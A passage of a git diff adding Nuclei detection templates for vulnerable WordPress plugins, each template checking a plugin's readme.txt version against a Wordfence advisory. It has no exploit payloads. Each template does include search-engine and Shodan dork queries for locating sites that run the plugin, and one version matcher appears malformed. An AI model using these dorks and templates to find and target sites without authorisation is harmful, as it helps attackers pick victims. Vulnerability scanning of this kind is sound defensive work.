dsl + dsl: + - compare_versions(version, '<= 1.1') \ No newline at end of file diff --git a/poc/other/post-from-frontend.yaml b/poc/other/post-from-frontend.yaml new file mode 100644 index 0000000000..b2d50ba1d9 --- /dev/null +++ b/poc/other/post-from-frontend.yaml @@ -0,0 +1,59 @@ +id: post-from-frontend + +info: + name: > + Post From Frontend <= 1.0.0 - Cross-Site Request Forgery to Arbitrary Post Deletion + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c092629f-177c-4201-9fdd-defe47f85811?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/post-from-frontend/" + google-query: inurl:"/wp-content/plugins/post-from-frontend/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,post-from-frontend,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/post-from-frontend/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "post-from-frontend" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.0') \ No newline at end of file diff --git a/poc/other/pretix-widget.yaml b/poc/other/pretix-widget.yaml new file mode 100644 index 0000000000..b05de21aa7 --- /dev/null +++ b/poc/other/pretix-widget.yaml @@ -0,0 +1,59 @@ +id: pretix-widget + +info: + name: > + pretix widget <= 1.0.5 - Authenticated (Contributor+) Local File Inclusion + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/cd106b92-48ee-46f4-b0a3-f595d227a0a1?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/pretix-widget/" + google-query: inurl:"/wp-content/plugins/pretix-widget/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,pretix-widget,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/pretix-widget/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "pretix-widget" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.5') \ No newline at end of file diff --git a/poc/other/product-customizer-light-6ecff9673f13aa763d6821bb8cdcdfc8.yaml b/poc/other/product-customizer-light-6ecff9673f13aa763d6821bb8cdcdfc8.yaml new file mode 100644 index 0000000000..45b00d7d2d --- /dev/null +++ b/poc/other/product-customizer-light-6ecff9673f13aa763d6821bb8cdcdfc8.yaml @@ -0,0 +1,59 @@ +id: product-customizer-light-6ecff9673f13aa763d6821bb8cdcdfc8 + +info: + name: > + Product Customizer Light <= 1.0.0 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File Upload + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/18d1feee-347c-4f43-a01b-67b3d0a5b2d6?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/product-customizer-light/" + google-query: inurl:"/wp-content/plugins/product-customizer-light/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,product-customizer-light,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/product-customizer-light/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "product-customizer-light" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.0') \ No newline at end of file diff --git a/poc/other/restaurantconnect-reswidget.yaml b/poc/other/restaurantconnect-reswidget.yaml new file mode 100644 index 0000000000..cbed4847ca --- /dev/null +++ b/poc/other/restaurantconnect-reswidget.yaml @@ -0,0 +1,59 @@ +id: restaurantconnect-reswidget + +info: + name: > + Restaurant Reservations Widget <= 1.0 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e08c0e74-4ce0-4278-8f58-909f7c24f346?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/restaurantconnect-reswidget/" + google-query: inurl:"/wp-content/plugins/restaurantconnect-reswidget/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,restaurantconnect-reswidget,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/restaurantconnect-reswidget/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "restaurantconnect-reswidget" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0') \ No newline at end of file diff --git a/poc/other/rss-feed-widget-80a0a36ea063283e29ed3c5e77408ead.yaml b/poc/other/rss-feed-widget-80a0a36ea063283e29ed3c5e77408ead.yaml new file mode 100644 index 0000000000..53193265dc --- /dev/null +++ b/poc/other/rss-feed-widget-80a0a36ea063283e29ed3c5e77408ead.yaml @@ -0,0 +1,59 @@ +id: rss-feed-widget-80a0a36ea063283e29ed3c5e77408ead + +info: + name: > + RSS Feed Widget <= 2.9.9 - Authenticated (Contributor+) Stored Cross-Site Scripting via rfw-youtube-videos Shortcode + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b77ea258-dced-4c36-bd0d-8977a347d1c9?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/rss-feed-widget/" + google-query: inurl:"/wp-content/plugins/rss-feed-widget/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,rss-feed-widget,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/rss-feed-widget/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "rss-feed-widget" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.9.9') \ No newline at end of file diff --git a/poc/other/sb-random-posts-widget.yaml b/poc/other/sb-random-posts-widget.yaml new file mode 100644 index 0000000000..aab8db0908 --- /dev/null +++ b/poc/other/sb-random-posts-widget.yaml @@ -0,0 +1,59 @@ +id: sb-random-posts-widget + +info: + name: > + SB Random Posts Widget <= 1.0 - Authenticated (Contributor+) Local File Inclusion + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d6fbf684-8651-484d-9459-ed11d6d9008f?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/sb-random-posts-widget/" + google-query: inurl:"/wp-content/plugins/sb-random-posts-widget/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,sb-random-posts-widget,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/sb-random-posts-widget/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "sb-random-posts-widget" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0') \ No newline at end of file diff --git a/poc/other/shortcode-support-for-elementor-templates.yaml b/poc/other/shortcode-support-for-elementor-templates.yaml new file mode 100644 index 0000000000..f5161dd6e0 --- /dev/null +++ b/poc/other/shortcode-support-for-elementor-templates.yaml @@ -0,0 +1,59 @@ +id: shortcode-support-for-elementor-templates + +info: + name: > + Shortcode For Elementor Templates <= 1.0.0 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d5a3b416-4434-456e-91c7-24f874e8f959?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/shortcode-support-for-elementor-templates/" + google-query: inurl:"/wp-content/plugins/shortcode-support-for-elementor-templates/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,shortcode-support-for-elementor-templates,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/shortcode-support-for-elementor-templates/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "shortcode-support-for-elementor-templates" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.0') \ No newline at end of file diff --git a/poc/other/simple-baseball-scoreboard.yaml b/poc/other/simple-baseball-scoreboard.yaml new file mode 100644 index 0000000000..fc45175ca0 --- /dev/null +++ b/poc/other/simple-baseball-scoreboard.yaml @@ -0,0 +1,59 @@ +id: simple-baseball-scoreboard + +info: + name: > + Simple Baseball Scoreboard <= 1.3 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/0519d77a-2fbd-48d5-bc2b-9efb84f9e559?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/simple-baseball-scoreboard/" + google-query: inurl:"/wp-content/plugins/simple-baseball-scoreboard/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,simple-baseball-scoreboard,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/simple-baseball-scoreboard/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "simple-baseball-scoreboard" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3') \ No newline at end of file diff --git a/poc/other/smooth-gallery-replacement.yaml b/poc/other/smooth-gallery-replacement.yaml new file mode 100644 index 0000000000..b5b46fc51f --- /dev/null +++ b/poc/other/smooth-gallery-replacement.yaml @@ -0,0 +1,59 @@ +id: smooth-gallery-replacement + +info: + name: > + Smooth Gallery Replacement <= 1.0 - Cross-Site Request Forgery to Stored Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ba8c88e9-e84c-4fe7-a3b1-ee77c49d5590?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/smooth-gallery-replacement/" + google-query: inurl:"/wp-content/plugins/smooth-gallery-replacement/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,smooth-gallery-replacement,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/smooth-gallery-replacement/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "smooth-gallery-replacement" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0') \ No newline at end of file diff --git a/poc/other/suki-sites-import-4694ec357c3309f764352c01cbaa3638.yaml b/poc/other/suki-sites-import-4694ec357c3309f764352c01cbaa3638.yaml new file mode 100644 index 0000000000..f313a5f72f --- /dev/null +++ b/poc/other/suki-sites-import-4694ec357c3309f764352c01cbaa3638.yaml @@ -0,0 +1,59 @@ +id: suki-sites-import-4694ec357c3309f764352c01cbaa3638 + +info: + name: > + Suki Sites Import <= 1.2.1 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File Upload + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1c6dd146-a99e-4317-a703-de34735317c8?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/suki-sites-import/" + google-query: inurl:"/wp-content/plugins/suki-sites-import/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,suki-sites-import,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/suki-sites-import/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "suki-sites-import" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.1') \ No newline at end of file diff --git a/poc/other/support-chat-18aa420081599222efb2bc477402197c.yaml b/poc/other/support-chat-18aa420081599222efb2bc477402197c.yaml new file mode 100644 index 0000000000..d72be56202 --- /dev/null +++ b/poc/other/support-chat-18aa420081599222efb2bc477402197c.yaml @@ -0,0 +1,59 @@ +id: support-chat-18aa420081599222efb2bc477402197c + +info: + name: > + Click to Chat – WP Support All-in-One Floating Widget <= 2.3.3 - Authenticated (Contributor+) Stored Cross-Site Scripting via wpsaio_snapchat Shortcode + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b4c13600-0791-4ade-9c28-f43f164aedae?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/support-chat/" + google-query: inurl:"/wp-content/plugins/support-chat/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,support-chat,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/support-chat/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "support-chat" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.3.3') \ No newline at end of file diff --git a/poc/other/talkback-secure-linkback-protocol.yaml b/poc/other/talkback-secure-linkback-protocol.yaml new file mode 100644 index 0000000000..5fa86f54b5 --- /dev/null +++ b/poc/other/talkback-secure-linkback-protocol.yaml @@ -0,0 +1,59 @@ +id: talkback-secure-linkback-protocol + +info: + name: > + Talkback <= 1.0 - Unauthenticated PHP Object Injection + author: topscoder + severity: critical + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/94fdc98a-c8be-47b4-a0a2-02d7373ab85e?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/talkback-secure-linkback-protocol/" + google-query: inurl:"/wp-content/plugins/talkback-secure-linkback-protocol/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,talkback-secure-linkback-protocol,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/talkback-secure-linkback-protocol/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "talkback-secure-linkback-protocol" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0') \ No newline at end of file diff --git a/poc/other/woo-edit-templates-52ac4a41ac945104628da0254866ee1d.yaml b/poc/other/woo-edit-templates-52ac4a41ac945104628da0254866ee1d.yaml new file mode 100644 index 0000000000..870fbefba6 --- /dev/null +++ b/poc/other/woo-edit-templates-52ac4a41ac945104628da0254866ee1d.yaml @@ -0,0 +1,59 @@ +id: woo-edit-templates-52ac4a41ac945104628da0254866ee1d + +info: + name: > + Edit WooCommerce Templates <= 1.1.2 - Reflected Cross-Site Scripting via page + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3704b365-cbdf-4c74-9619-59f0a10e3c6a?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/woo-edit-templates/" + google-query: inurl:"/wp-content/plugins/woo-edit-templates/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,woo-edit-templates,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/woo-edit-templates/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "woo-edit-templates" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.2') \ No newline at end of file diff --git a/poc/other/woo-shipping-dpd-baltic-5681113187062e697437a90c1e0dfe1a.yaml b/poc/other/woo-shipping-dpd-baltic-5681113187062e697437a90c1e0dfe1a.yaml new file mode 100644 index 0000000000..9a61c5cbe3 --- /dev/null +++ b/poc/other/woo-shipping-dpd-baltic-5681113187062e697437a90c1e0dfe1a.yaml @@ -0,0 +1,59 @@ +id: woo-shipping-dpd-baltic-5681113187062e697437a90c1e0dfe1a + +info: + name: > + DPD Baltic Shipping <= 1.2.83 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/6251d0f6-b536-4122-8fdf-bb77665a4f41?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/woo-shipping-dpd-baltic/" + google-query: inurl:"/wp-content/plugins/woo-shipping-dpd-baltic/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,woo-shipping-dpd-baltic,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/woo-shipping-dpd-baltic/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "woo-shipping-dpd-baltic" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.83') \ No newline at end of file diff --git a/poc/remote_code_execution/woo-parcel-pro-c9425826952d0dbfb82156a3b44360ef.yaml b/poc/remote_code_execution/woo-parcel-pro-c9425826952d0dbfb82156a3b44360ef.yaml new file mode 100644 index 0000000000..f00468ecf9 --- /dev/null +++ b/poc/remote_code_execution/woo-parcel-pro-c9425826952d0dbfb82156a3b44360ef.yaml @@ -0,0 +1,59 @@ +id: woo-parcel-pro-c9425826952d0dbfb82156a3b44360ef + +info: + name: > + Parcel Pro <= 1.8.4 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8e8fe6f4-7e41-44d3-9980-b5e7f43aa849?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/woo-parcel-pro/" + google-query: inurl:"/wp-content/plugins/woo-parcel-pro/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,woo-parcel-pro,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/woo-parcel-pro/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "woo-parcel-pro" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.8.4') \ No newline at end of file diff --git a/poc/search/acf-images-search-and-insert.yaml b/poc/search/acf-images-search-and-insert.yaml new file mode 100644 index 0000000000..152860a2bc --- /dev/null +++ b/poc/search/acf-images-search-and-insert.yaml @@ -0,0 +1,59 @@ +id: acf-images-search-and-insert + +info: + name: > + ACF Images Search And Insert <= 1.1.4 - Authenticated (Subscriber+) Arbitrary File Upload + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/107a0612-5e58-428b-a097-1c4012e89449?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/acf-images-search-and-insert/" + google-query: inurl:"/wp-content/plugins/acf-images-search-and-insert/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,acf-images-search-and-insert,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/acf-images-search-and-insert/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "acf-images-search-and-insert" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.4') \ No newline at end of file diff --git a/poc/social/social-share-with-floating-bar-ccbc333547a329aca2de86d7452504a3.yaml b/poc/social/social-share-with-floating-bar-ccbc333547a329aca2de86d7452504a3.yaml new file mode 100644 index 0000000000..9946a6f80b --- /dev/null +++ b/poc/social/social-share-with-floating-bar-ccbc333547a329aca2de86d7452504a3.yaml @@ -0,0 +1,59 @@ +id: social-share-with-floating-bar-ccbc333547a329aca2de86d7452504a3 + +info: + name: > + Social Share With Floating Bar <= 1.0.3 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2ec35484-8561-4a8c-bf67-0a880f915fb1?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/social-share-with-floating-bar/" + google-query: inurl:"/wp-content/plugins/social-share-with-floating-bar/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,social-share-with-floating-bar,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/social-share-with-floating-bar/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "social-share-with-floating-bar" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.3') \ No newline at end of file diff --git a/poc/sql/CVE-2024-10014-287fb7ccc9db018318f62de1bc8e246a.yaml b/poc/sql/CVE-2024-10014-287fb7ccc9db018318f62de1bc8e246a.yaml new file mode 100644 index 0000000000..ba06bdbb7f --- /dev/null +++ b/poc/sql/CVE-2024-10014-287fb7ccc9db018318f62de1bc8e246a.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10014-287fb7ccc9db018318f62de1bc8e246a + +info: + name: > + Flat UI Button <= 1.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via flatbtn Shortcode + author: topscoder + severity: low + description: > + The Flat UI Button plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's flatbtn shortcode in version 1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ec5474ac-62d7-4431-b789-51c831dd1c20?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-10014 + metadata: + fofa-query: "wp-content/plugins/flat-ui-button/" + google-query: inurl:"/wp-content/plugins/flat-ui-button/" + shodan-query: 'vuln:CVE-2024-10014' + tags: cve,wordpress,wp-plugin,flat-ui-button,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/flat-ui-button/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "flat-ui-button" + part: body + + - type: dsl + dsl: + - compare_versions(version, '1.0') \ No newline at end of file diff --git a/poc/sql/CVE-2024-8740-b2d2025fc8d62dbeaa509a90233bcea6.yaml b/poc/sql/CVE-2024-8740-b2d2025fc8d62dbeaa509a90233bcea6.yaml new file mode 100644 index 0000000000..5cf235f977 --- /dev/null +++ b/poc/sql/CVE-2024-8740-b2d2025fc8d62dbeaa509a90233bcea6.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8740-b2d2025fc8d62dbeaa509a90233bcea6 + +info: + name: > + GetResponse Forms by Optin Cat <= 2.5.6 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The GetResponse Forms by Optin Cat plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.5.6. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/51d14f45-4c30-4225-998d-f4f829e09bc0?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-8740 + metadata: + fofa-query: "wp-content/plugins/getresponse/" + google-query: inurl:"/wp-content/plugins/getresponse/" + shodan-query: 'vuln:CVE-2024-8740' + tags: cve,wordpress,wp-plugin,getresponse,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/getresponse/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "getresponse" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.5.6') \ No newline at end of file diff --git a/poc/sql/CVE-2024-9382-4e97289b6d15924ff13ebdb1ff9d487d.yaml b/poc/sql/CVE-2024-9382-4e97289b6d15924ff13ebdb1ff9d487d.yaml new file mode 100644 index 0000000000..e9f932e670 --- /dev/null +++ b/poc/sql/CVE-2024-9382-4e97289b6d15924ff13ebdb1ff9d487d.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9382-4e97289b6d15924ff13ebdb1ff9d487d + +info: + name: > + Gantry 4 Framework <= 4.1.21 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Gantry 4 Framework plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'override_id' parameter in all versions up to, and including, 4.1.21 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - 